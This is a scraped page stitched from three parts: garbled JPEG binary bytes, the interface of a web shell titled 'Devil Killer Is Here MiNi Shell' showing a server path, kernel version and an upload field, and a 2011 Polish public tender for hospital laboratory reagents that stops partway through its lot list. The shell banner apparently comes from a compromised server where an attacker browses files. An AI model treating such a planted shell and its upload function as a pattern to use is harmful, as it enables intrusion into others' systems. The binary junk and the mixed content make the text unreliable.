JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110304/73487-N-2011.html

<p class="kh_header"><b>Zielona Góra: Sukcesywne dostawy odczynników do celów diagnostycznych</b><br>
<b>Numer ogłoszenia: 73487 - 2011; data zamieszczenia: 04.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki  Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Zyty 26, 65-046 Zielona Góra, woj. lubuskie, tel. 068 3296200, faks 068 3255808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.szpital.zgo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy odczynników do celów diagnostycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia o łącznej  wartości   szacunkowej  649 000,00  PLN  (zamówienie podstawowe  i   uzupełniające)   są     sukcesywne    dostawy mikrobiologicznych  podłoży gotowych oraz generatorów atmosfery    i  pasków    wskaźnikowych    niezbędnych     do  założenia    hodowli  drobnoustrojów, krążków z antybiotykami, testów lateksowych, testów immunochromatograficznych kasetkowych i testów pomocniczych do wykrywania  określonych  cech     drobnoustrojów,   krążków  diagnostycznych, plastykowych pasków nasączonych antybiotykami do   oznaczania     najmniejszego stężenia hamującego wzrost  drobnoustrojów,  testów    lateksowych do    wykrywania  i identyfikacji somatycznych antygenów,testów manulanych do identyfikacji grzybów drożdżopodobnych, podłoży bakteriologicznych, odczynników i testów biologicznych, krążków i pasków   do    identyfikacji i różnicowania drobnoustrojów, immunochromatograficznych testów paskowych oraz kasetkowych do  wykrywania antygenów in vitro, odczynników do gazometrii do aparatu ABL 500, odczynników  i akcesorii do czytnika LabUReader, odczynników biochemicznych, zestawów kontrolnych do zewnątrzlaboratoryjnej kontroli jakości badań, odczynników, kalibratorów, odczynników serologicznych,  kontroli i materiałów zużywalnych do rozdziału elektroforetycznego białek surowicy krwi wraz z dzierżawą zautomatyzowanego systemu do rozdziału białek, pasków testowych do pomiaru glukozy do  glukometrów GLUCOCARD G+meter, odczynników, standardów, materiałów zużywalnych i akcesoriów do wykonania 110 000 oznaczeń glukozy we krwi włośniczkowej wraz z dzierżawą analizatora glukozy, odczynników, materiałów zużywalnych i akcesoriów do wykonania 5000 oznaczeń równowagi   kwasowo  -   zasadowej wraz z dzierżawą analizatora gazometrycznego oraz odczynników (bez krwinek wzorcowych), materiałów zużywalnych i akcesoriów do wykonania 36 500 badań z zakresu immunologii transfuzjologicznej wraz z dzierżawą analizatora        z oprogramowaniem  i zestawem back-up (wirówka, pipeta, dyspensor, inkubator)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem   zamówień uzupełniajacych do 20% wartości zamówienia podstawowego są     sukcesywne    dostawy mikrobiologicznych  podłoży gotowych oraz generatorów atmosfery    i  pasków    wskaźnikowych    niezbędnych     do  założenia    hodowli  drobnoustrojów, krążków z antybiotykami, testów lateksowych, testów   immunochromatograficznych kasetkowych i testów pomocniczych do wykrywania  określonych  cech     drobnoustrojów,   krążków  diagnostycznych, plastykowych pasków nasączonych antybiotykami do   oznaczania     najmniejszego stężenia hamującego wzrost  drobnoustrojów,  testów    lateksowych do    wykrywania  i identyfikacji somatycznych antygenów,testów manulanych do identyfikacji grzybów drożdżopodobnych, podłoży bakteriologicznych, odczynników i testów biologicznych, krążków i pasków   do    identyfikacji i różnicowania drobnoustrojów, immunochromatograficznych testów paskowych oraz kasetkowych do  wykrywania antygenów in vitro, odczynników do gazometrii do aparatu ABL 500, odczynników  i akcesorii do czytnika LabUReader, odczynników biochemicznych, zestawów kontrolnych do zewnątrzlaboratoryjnej kontroli jakości badań, odczynników, kalibratorów, odczynników serologicznych,  kontroli i materiałów zużywalnych do rozdziału elektroforetycznego białek surowicy krwi wraz z dzierżawą zautomatyzowanego systemu do rozdziału białek, pasków testowych do pomiaru glukozy do  glukometrów GLUCOCARD G+meter, odczynników, standardów, materiałów zużywalnych i akcesoriów do wykonania 110 000 oznaczeń glukozy we krwi włośniczkowej wraz z dzierżawą analizatora glukozy, odczynników, materiałów zużywalnych i akcesoriów do wykonania 5000 oznaczeń równowagi   kwasowo  -   zasadowej wraz z dzierżawą analizatora gazometrycznego oraz odczynników (bez krwinek wzorcowych), materiałów zużywalnych i akcesoriów do wykonania 36 500 badań z zakresu immunologii transfuzjologicznej wraz z dzierżawą analizatora  z oprogramowaniem    i zestawem back-up (wirówka, pipeta, dyspensor, inkubator).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 33.69.62.00-7, 33.12.41.31-2, 39.69.81.00-0, 38.43.40.00-6, 38.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia w zakresie posiadanej wiedzy i doświadczenia. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium /spełnia - nie spełnia/ na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia w zakresie dysponowania odpowiednim potencjałem technicznym. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia w zakresie dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie dysponowania osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia w zakresie sytuacji ekonomicznej i finansowej. Ocenia spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: 1) oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu udostępniającego zasób dotyczący zdolności finansowej wraz ze stosowną informacją banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których podmiot udostępniający wskazany zasób rachunek, potwierdzająca wysokość posiadanych środków lub jego zdolność kredytową. 2)opłacona polisa lub inny właściwy dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia dla poszczególnych zadań na kwotę co najmniej: 
- zadanie nr 1, 15                                  -  50 000,00 złotych
- zadanie nr 3, 17                                  -    20 000,00 złotych
- zadanie nr 6, 9, 12, 16                        -   10 000,00 złotych
- zadanie nr 2, 4, 5, 7, 8, 10, 11, 13, 14  -     5 000,00 złotych  

Uwaga: W przypadku składania oferty obejmującej kilka zadań wartość załączonej polisy powinna odpowiadać  najwyższej wymaganej polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) odpis z właściwego rejestru - w przypadku, gdy wykonawca jest osobą prawną</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.zgo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki SPZOZ w Zielonej Górze, 65-046 Zielona Góra, ul. Zyty 26 - budynek administracyjny - pok. 019 - 25,00 PLN + koszty przekazania.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2011 godzina 10:00, miejsce: Szpital Wojewódzki SPZOZ w Zielonej Górze, 65-046 Zielona Góra, ul. Zyty 26 - budynek administracyjny - pok. 201 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywne dostawy gotowych podłoży mikrobiologicznych na płytkach Petriego O 90 mm i O 55 mm, podłoży mikrobiologicznych  chromogennych gotowych na płytkach Petriego O 90 mm, podłoży mikrobiologicznych gotowych, dzielonych na płytkach Petriego O 90 mm, podłoży mikrobiologicznych w probówkach zakręcanych , innych podłoży oraz generatorów atmosfery i pasków wskaźnikowych środowiska beztlenowego  niezbędnych do założenia hodowli drobnoustrojów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 162 480,00 PLN              ( zamówienie podstawowe i uzupełniajace) sukcesywne dostawy gotowych podłoży mikrobiologicznych na płytkach Petriego O 90 mm i O 55 mm, podłoży mikrobiologicznych  chromogennych gotowych na płytkach Petriego O 90 mm, podłoży mikrobiologicznych gotowych, dzielonych na płytkach Petriego O 90 mm, podłoży mikrobiologicznych w probówkach zakręcanych , innych podłoży oraz generatorów atmosfery i pasków wskaźnikowych środowiska beztlenowego  niezbędnych do założenia hodowli drobnoustrojów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.81.00-0, 33.12.41.31-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Krążki z antybiotykami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łacznej wartości szacunkowej 11280,00 PLN (zamówienie podstawowe i uzupełniające) sa sukcesywne dostawy krążków          z antybiotykami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy testów lateksowych, testów kasetkowych immunochromatograficznych oraz testów pomocniczych do wykrywania określonych cech drobnoustrojów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 69 360,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne testów lateksowych, testów kasetkowych immunochromatograficznych oraz testów pomocniczych do wykrywania określonych cech drobnoustrojów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne dostawy krażków diagnostycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o  łacznej wartości szacunkowej 12 960,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy krążków diagnostycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne   dostawy   plastikowych pasków nasączonych antybiotykami w gradiencie stężeń  do oznaczania najmniejszego stężenia hamującego wzrost drobnoustrojów (MIC).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 10 800 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne   dostawy   plastikowych pasków nasączonych antybiotykami w gradiencie stężeń  do oznaczania najmniejszego stężenia hamującego wzrost drobnoustrojów (MIC).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sukcesywne dostawy podłoży bakteriologicznych, odczynników, testów biologicznych, krążków i pasków do identyfikacji i różnicowania drobnoustrojów, testów manualnych do jednoczesnej identyfikacji grzybów drożdżopodobnych oraz określania lekowrażliwości oraz testów lateksowych do wykrywania i identyfikacji somatycznych antygenów: enteropatogennych i enterokrwotocznych pałeczek Escherichia coli, Shigella sonnei, Salmonella spp. wraz z akcesoriami umożliwiającymi wykonanie testu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 31320,00 PLN (zamówienie podstawowe i uzupełniajace) są sukcesywne dostawy podłoży bakteriologicznych, odczynników, testów biologicznych, krążków i pasków do identyfikacji i różnicowania drobnoustrojów, testów manualnych do jednoczesnej identyfikacji grzybów drożdżopodobnych oraz określania lekowrażliwości oraz testów lateksowych do wykrywania i identyfikacji somatycznych antygenów: enteropatogennych i enterokrwotocznych pałeczek Escherichia coli, Shigella sonnei, Salmonella spp. wraz z akcesoriami umożliwiającymi wykonanie testu tj. płytkami szklanymi  i patyczkami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 33.12.41.31-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sukcesywne dostawy immunochromatograficznych testów paskowych oraz kasetkowych do wykrywania antygenów in vitro.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łacznej wartości szacunkowej 6480,00 PLN (zamówienie podstawowe i uzupełniajace)Sukcesywne dostawy immunochromatograficznych testów paskowych oraz kasetkowych do wykrywania antygenów in vitro.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.31-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sukcesywne dostawy odczynników do aparatu do gazometrii ABL 500 ( własność zamawiającego).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 9720,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy odczynników do aparatu do gazometrii ABL 500 ( własność zamawiającego).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Sukcesywne dostawy odczynników i akcesorii do czytnika LabUReader (własność zamawiajacego).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej  21 755,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy odczynników i akcesorii do czytnika LabUReader (własność zamawiajacego).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Sukcesywne dostawy odczynników biochemicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łacznej wartości szacunkowej 11 760,00 PLN (zamówienie podstawowe i uzupełniajace) są sukcesywne dostawy odczynników biochemicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Sukcesywne dostawy zestawów kontrolnych do zewnątrzlaboratoryjnej kontroli jakości badań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 16320,00 PLN (zamówienie podstawowe i uzupełniające) są  sukcesywne dostawy zestawów kontrolnych do zewnątrzlaboratoryjnej kontroli jakości badań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Sukcesywne dostawy pasków do glukometrów Glucocard G+meter (własność zamawiającego).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia o łącznej wartości szacunkowej 25860,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy pasków do glukometrów Glucocard G+meter (własność zamawiającego).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
